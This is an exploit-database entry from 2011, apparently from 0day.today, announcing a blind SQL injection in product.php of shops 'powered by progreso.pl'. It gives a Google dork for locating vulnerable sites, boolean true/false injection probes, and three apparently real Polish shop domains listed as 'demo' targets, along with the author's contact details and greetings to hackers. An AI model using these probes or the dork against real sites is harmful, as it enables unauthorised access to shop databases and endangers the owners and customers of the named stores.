id: 15901
date: 04/21/2011
title: Powered by progreso.pl. <= Blind SQL Injection Vulnerability
author: Caddy-Dz
cves: 

===========================================================================
# Exploit Title: progreso.pl. <==  Blind SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# Category:: webapps
# E-mail: islam_babia@hotmail.com
# Google dork: intext:"powered by progreso.pl."
# Tested on: [Windows Vista Edition Intégrale]
################

[*] Blind SQL injection Vulnerability

#  http://127.0.0.1/product.php?id=1 and 1=1--    [*] True

#  http://127.0.0.1/product.php?id=1 and 1=2--    [*] False

#  http://127.0.0.1/product.php?id=[Sqli]         [*] Ev!L
### 

[*] Demo Site:

#  http://shop.limodesign.pl/product.php?id=[SQLi]
#  http://www.sklep.ogrody.civ.pl/product.php?id=[SQLi]
#  http://sklep.eob.pl/product.php?id=[SQLi]

=============================================================================
# Greets To : KedAns-Dz & All Algerians Hackers
=============================================================================


#  0day.today [2023-03-24]  #